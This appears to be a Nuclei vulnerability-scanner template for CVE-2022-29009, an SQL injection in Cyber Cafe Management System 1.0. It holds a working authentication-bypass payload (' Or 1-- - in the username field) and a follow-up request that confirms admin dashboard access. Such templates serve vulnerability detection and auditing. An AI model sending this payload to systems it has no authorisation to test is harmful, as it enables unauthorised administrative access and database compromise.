nuclei-templates/http/cves/2022/CVE-2022-29009.yaml

57 lines
1.9 KiB
YAML

id: CVE-2022-29009
info:
name: Cyber Cafe Management System 1.0 - SQL Injection
author: TenBird
severity: critical
description: |
Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/50355
- https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
- https://nvd.nist.gov/vuln/detail/CVE-2022-29009
- https://github.com/sudoninja-noob/CVE-2022-29009/blob/main/CVE-2022-29009.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29009
cwe-id: CWE-89
epss-score: 0.16542
epss-percentile: 0.95488
cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: phpgurukul
product: cyber_cafe_management_system
tags: cve2022,sqli,auth-bypass,edb,cve
http:
- raw:
- |
POST /ccms/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=%27+Or+1--+-&password=1&login=
- |
GET /ccms/dashboard.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'CCMS Admin Dashboard'
- 'CCMS ADMIN | Admin'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e72d34f25bbaa3073b1842376c784d1041682fddd692a38c5dd78070167d047c022100962028fdaa9d0ce6b7ffc17607152e225f6dfca5c4c031de11348249abfdaec4:922c64590222798bb761d5b6d8e72950